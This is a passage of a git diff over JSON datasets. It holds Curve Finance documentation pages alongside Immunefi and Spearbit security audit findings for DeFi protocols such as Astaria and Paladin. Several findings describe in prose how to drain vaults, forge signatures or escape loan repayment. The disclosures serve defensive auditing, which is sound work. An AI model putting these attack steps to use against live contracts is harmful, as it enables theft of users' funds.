it shares a pool with a synth (sUSD/sETH/sBTC) They are in beta They are expensive (~$80 at 50 gwei) and therefore best suited for large trades They have two parts and thus two transactions Initiating the trade After selecting the two assets you would like to trade, click sell and confirm the first part of your transaction. For the route below, we will go from DAI to sUSD to sBTC to renBTC. The first part of the trade takes you to sBTC. Upon confirmation you will receive an NFT which represents your trade. The trade will immediately enter a settlement period of six minutes. It is best not to close your browser during that period. Settlement and completing your trade After Synthetix settlement period, you will then be able to complete your trade by clicking the Complete trade button. This second part will then take you from sBTC to renBTC. After confirming this transaction, you then receive your renBTC. Technical Docs Read technical docs here: https://curve.readthedocs.io/cross-asset-swaps.html 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2178,7 +2210,7 @@ { "title": "Disabling crypto wallets in brave", "html_url": "https://resources.curve.fi/troubleshooting/disabling-crypto-wallets-in-brave/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Disabling Crypto Wallets in Brave Pointing Brave to Metamask Disabling crypto wallets in brave Disabling Crypto Wallets in Brave The native \"Crypto Wallets\" app in your Brave browser can often interfere with your web3 provider. When using Metamask, it is important to make sure Brave is pointing to it and not its native implementation. Pointing Brave to Metamask Open your web browser, and paste the following in your URL bar: brave://settings/extensions Click the dropdown and switch to Metamask. You can also disable Crypto Wallets on startup. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Disabling crypto wallets in brave Table of contents Pointing Brave to Metamask Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Pointing Brave to Metamask Home Troubleshooting Disabling crypto wallets in brave The native \"Crypto Wallets\" app in your Brave browser can often interfere with your web3 provider. When using Metamask, it is important to make sure Brave is pointing to it and not its native implementation. Pointing Brave to Metamask Open your web browser, and paste the following in your URL bar: brave://settings/extensions Click the dropdown and switch to Metamask. You can also disable Crypto Wallets on startup. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2186,15 +2218,15 @@ { "title": "Dropping and replacing a stuck transaction", "html_url": "https://resources.curve.fi/troubleshooting/dropping-and-replacing-a-stuck-transaction/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction Dropping and replacing a stuck transaction Table of contents Dropping and replacing a stuck transaction Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Dropping and replacing a stuck transaction Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction Dropping and replacing a stuck transaction Dropping and replacing a stuck transaction A short tutorial on dropping and replacing a stuck Ethereum transaction. You've submitted a transaction in Metamask and it just won't come through. Those gas estimates betrayed you and you're stuck looking at your pending transaction on Etherscan. It's happened to everyone and it's not pleasant but there's a fairly simple solution which most people will come to learn about. This guide isn't Curve Finance specific but as gas prices are reaching new highs, stuck transactions are getting more common and knowing how to drop and replace is thus become more and more useful. First and foremost, it's important to understand you can only do this if your transaction is pending. If it isn't your transaction cannot be cancelled anymore. If you want to understand how this works, you should know that Ethereum transactions must be submitted with an incremental nonce. Each transaction has a nonce (a number) assigned to it and a number cannot be skipped. The way to replace and drop is to submit a new transaction with a higher gas price and the same nonce. This will tell the miners this more expensive transaction is the one that should be mined and your stuck transaction will be discarded. Enable custom nonce in Metamask Visit Metamask and select \"Settings\", then \"Advanced\" and scroll down to find and enable \"Customize transaction nonce\". Finding your pending transaction nonce Visit your address on Etherscan and click on your pending transaction. If you scroll down you will find \"Nonce\": Write down this nonce and return to Metamask. Replacing your transaction Now that you have your nonce, go back to Ethereum and send yourself 0 Ethereum, on the confirmation screen, type the nonce you got from Etherscan. Make sure your gas price is suitable this time by checking https://ethgasstation.info/ for example. Confirm your transaction and that's it. Your 0 Ethereum transaction should be mined which will drop and replace your stuck transaction which you can confirm on Etherscan. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Dropping and replacing a stuck transaction Table of contents Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Enable custom nonce in Metamask Finding your pending transaction nonce Replacing your transaction Home Troubleshooting Dropping and replacing a stuck transaction A short tutorial on dropping and replacing a stuck Ethereum transaction. You've submitted a transaction in Metamask and it just won't come through. Those gas estimates betrayed you and you're stuck looking at your pending transaction on Etherscan. It's happened to everyone and it's not pleasant but there's a fairly simple solution which most people will come to learn about. This guide isn't Curve Finance specific but as gas prices are reaching new highs, stuck transactions are getting more common and knowing how to drop and replace is thus become more and more useful. First and foremost, it's important to understand you can only do this if your transaction is pending. If it isn't your transaction cannot be cancelled anymore. If you want to understand how this works, you should know that Ethereum transactions must be submitted with an incremental nonce. Each transaction has a nonce (a number) assigned to it and a number cannot be skipped. The way to replace and drop is to submit a new transaction with a higher gas price and the same nonce. This will tell the miners this more expensive transaction is the one that should be mined and your stuck transaction will be discarded. Enable custom nonce in Metamask Visit Metamask and select \"Settings\", then \"Advanced\" and scroll down to find and enable \"Customize transaction nonce\". Finding your pending transaction nonce Visit your address on Etherscan and click on your pending transaction. If you scroll down you will find \"Nonce\": Write down this nonce and return to Metamask. Replacing your transaction Now that you have your nonce, go back to Ethereum and send yourself 0 Ethereum, on the confirmation screen, type the nonce you got from Etherscan. Make sure your gas price is suitable this time by checking https://ethgasstation.info/ for example. Confirm your transaction and that's it. Your 0 Ethereum transaction should be mined which will drop and replace your stuck transaction which you can confirm on Etherscan. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Recovering a cross asset swap", + "title": "Recovering cross-asset swaps", "html_url": "https://resources.curve.fi/troubleshooting/recovering-a-cross-asset-swap/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Recovering a cross asset swap Table of contents Recovering a cross-asset swap Finding the token id Initiate recovery Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Recovering a cross-asset swap Finding the token id Initiate recovery Recovering a cross asset swap Recovering a cross-asset swap If Curve has lost transaction of your cross asset swap, do not panic, there is a simple way to recover it. Finding the token id Visit your address on Etherscan and click on ERC721: And then click on your latest cross-asset swap, you should find a long string of numbers like below: Initiate recovery Visit: https://www.curve.fi/recover Enter your token id found on Etherscan, enter your the token you would like to receive (if your token has sBTC then it must be a Bitcoin token that shares a pool with sBTC, if your token is sUSD, it should be a token that shares a pool with sUSD) and then click recover. Confirm your transaction and you're done. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Recovering cross-asset swaps Table of contents Finding the token id Initiate recovery Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Finding the token id Initiate recovery Home Troubleshooting Recovering cross-asset swaps If Curve has lost transaction of your cross asset swap, do not panic, there is a simple way to recover it. Finding the token id Visit your address on Etherscan and click on ERC721: And then click on your latest cross-asset swap, you should find a long string of numbers like below: Initiate recovery Visit: https://www.curve.fi/recover Enter your token id found on Etherscan, enter your the token you would like to receive (if your token has sBTC then it must be a Bitcoin token that shares a pool with sBTC, if your token is sUSD, it should be a token that shares a pool with sUSD) and then click recover. Confirm your transaction and you're done. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2202,7 +2234,7 @@ { "title": "Support", "html_url": "https://resources.curve.fi/troubleshooting/support/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Support Table of contents Understanding Technical Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Technical Support Support Understanding Technical Support Curve is to be used entirely at your own risk. Admins have no special keys and cannot recover funds if sent improperly. However, a wide variety of resources are still available to help you avoid issues. If you have questions, please make sure to check with the following sources: This section contains common troubleshooting questions, as does the entirety of this documentation. The technical documentation is a comprehensive resource for coders. The Telegram channel is an active place to seek support. The Discord also has an active support channel. Most users use Curve without issue, however we understand it can be complicated so make sure to ask first and save yourself any possible trouble later! Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Home Troubleshooting Support Curve is to be used entirely at your own risk. Admins have no special keys and cannot recover funds if sent improperly. However, a wide variety of resources are still available to help you avoid issues. If you have questions, please make sure to check with the following sources: This section contains common troubleshooting questions, as does the entirety of this documentation. The technical documentation is a comprehensive resource for coders. The Telegram channel is an active place to seek support. The Discord also has an active support channel. Most users use Curve without issue, however we understand it can be complicated so make sure to ask first and save yourself any possible trouble later! 2023-09-28 Back to top", "labels": [ "Documentation" ] diff --git a/results/immunefi_findings.json b/results/immunefi_findings.json index b165375..6d1e1b6 100644 --- a/results/immunefi_findings.json +++ b/results/immunefi_findings.json @@ -1,4 +1,52 @@ [ + { + "title": "Yield Protocol Logic Error", + "html_url": "https://medium.com/immunefi/yield-protocol-logic-error-bugfix-review-7b86741e6f50", + "body": "The vulnerability involved a potential exploit that could allow an attacker to drain the base tokens from a pool by manipulating the token balance of a contract.", + "labels": [ + "Logic" + ] + }, + { + "title": "Silo Finance Logic Error", + "html_url": "https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a", + "body": "The bug could manipulate the interest rate to borrow more funds than should have been allowed by the system.", + "labels": [ + "Logic" + ] + }, + { + "title": "DFX Finance Rounding Error", + "html_url": "https://medium.com/immunefi/dfx-finance-rounding-error-bugfix-review-17ba5ffb4114", + "body": "Rounding error with EURS token due to the non-standard decimal value of two.", + "labels": [ + "Logic" + ] + }, + { + "title": "Enzyme Finance Missing Privilege Check", + "html_url": "https://medium.com/immunefi/enzyme-finance-missing-privilege-check-bugfix-review-ddb5e87b8058", + "body": "This critical bug could have led to the draining of Enzyme's Vault.", + "labels": [ + "Missing Privilege Check" + ] + }, + { + "title": "Beanstalk Logic Error", + "html_url": "https://medium.com/immunefi/beanstalk-logic-error-bugfix-review-4fea17478716", + "body": "This critical logic error allowed theft of assets from the accounts that were approved for the Beanstalk contract.", + "labels": [ + "Logic" + ] + }, + { + "title": "Balancer Logic Error", + "html_url": "https://medium.com/immunefi/balancer-logic-error-bugfix-review-74f5edca8b1a", + "body": "This high severity bug allowed liquidity providers to submit duplicate claims and drain all the Merkle Orchad's assets from the Vault.", + "labels": [ + "Logic" + ] + }, { "title": "Moonbeam, Astar, And Acala Library Truncation Bugfix Review \u2014 $1m Payout", "html_url": "https://medium.com/immunefi/moonbeam-astar-and-acala-library-truncation-bugfix-review-1m-payout-41a862877a5b", diff --git a/results/spearbit_findings.json b/results/spearbit_findings.json index 56f492b..9c96f2b 100644 --- a/results/spearbit_findings.json +++ b/results/spearbit_findings.json @@ -1,17832 +1,21232 @@ [ { - "title": "LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When transferFrom is called, there is not check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners who are also owners of the vault's lien tokens, they can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, yIntercept, slope, last, epochData of VaultData need to be updated (this requires knowing the lien's end). However, private vaults do not keep a record of these values, and the corresponding values are only saved in stacks off-chain and validated on-chain using their hash.", + "title": "Verify user has indeed voted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "If an error is made in the merkle trees (either by accident or on purpose) a user that did not vote (in that period for that gauge) might get rewards assigned to him. Although the Paladin documentation says: \"the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period\", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: High Risk" ] }, { - "title": "Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block if receiver is a valid vault the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So for example any supplied private vault as a receiver would be allowed here and the call to _validateCommitment will continue without reverting at least in this if block. If we backtrack function calls to _validateCommitment, we arrive to 3 exposed endpoints: commitToLiens buyoutLien commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. 8 A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommit- ment to check whether it is allowed to be used and finally when transferring safeTransfer) wETH. This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V . 2. Takes a valid commitment C and combines it with V and supply those to commitToLien. 3. Calls withdraw endpoint of V to withdraw all the funds. For step 2. the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens and take all the commitments C0, (cid:1) (cid:1) (cid:1) , Cn and supply them one by one along with V to commitToLien endpoint of the vault that was specified by each Ci . 2. Frontrun calls to commitToLien endpoints of vaults, take their commitment C and combine it with V to send to commitToLien. 3. Backrun the either scenarios from the above points and create a new commitment with new lien request that tries to max out the potential debt for a collateral while also keeping other inequalities valid (for example, the inequality regarding liquidationInitialAsk).", + "title": "Tokens could be sent / withdrawn multiple times by accident", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but in- terfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the periods, as closeQuestPeriod() checks the state of the first quest. 2. Suppose you have closed the second quest of a period via closePartOfQuestPeriod(), but closeQuest- Period() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor, again. Also, function closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues with future code changes. 5 function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... // We use the 1st QuestPeriod of this period to check it was not Closed uint256[] memory questsForPeriod = questsByPeriod[period]; require( ,! periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period \"QuestBoard: Period already closed\" ); ... // no further checks on currentState _questPeriod.withdrawableAmount = .... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again) ... } // sets withdrawableAmount (again) function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ,! ... _questPeriod.currentState = PeriodState.CLOSED; ... _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount; IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); ... } Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: High Risk" ] }, { - "title": "Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32(\"ACTIVE_AUCTION\") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: List the asset for sale on Seaport for 1 wei. Take the maximum possible loans against the asset. Buy the asset on Seaport for 1 wei. The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei).", + "title": "Limit possibilities of recoverERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function recoverERC20() in contract MultiMerkleDistributor.sol allows the retrieval of all ERC20 tokens from the MultiMerkleDistributor.sol whereas the comment indicates it is only meant to retrieve those tokens that have been sent by mistake. Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "validateStack allows any stack to be used with collateral with no liens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The validateStack modifier is used to confirm that a stack entered by a user matches the stateHash in storage. However, the function reverts under the following conditions: if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } The result is that any collateral with stateHash == bytes32(0) (which is all collateral without any liens taken against it yet) will accept any provided stack as valid. This can be used in a number of harmful ways. Examples of vulnerable endpoints are: createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can _mint any unminted liens which can DoS the system. _burn lienIds that they don't have the right to remove. manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyout- Lien. It seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into. And the caller/user is supposed to only call into here from VaultImplementa- tion.buyoutLien.", + "title": "Updating QuestBoard in MultiMerkleDistributor.sol will not work", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the collateral s.auctionData is not populated and thus, function gets called since stack.length is 0, this loop will not run and no payment is sent to the lending vaults. The rest of the payment is sent to the borrower. And the collateral token and its related data gets burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: Liens are continued. Collateral state hash is unchanged. liquidator isn't set. Vaults aren't updated. Withdraw proxies aren't set, etc. Related issue 88.", + "title": "Old quests can be extended via increaseQuestDuration()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "Phony signatures can be used to forge any strategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) 11 This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done. The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated.", + "title": "Accidental call of addQuest could block contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The addQuest() function uses an onlyAllowed access control 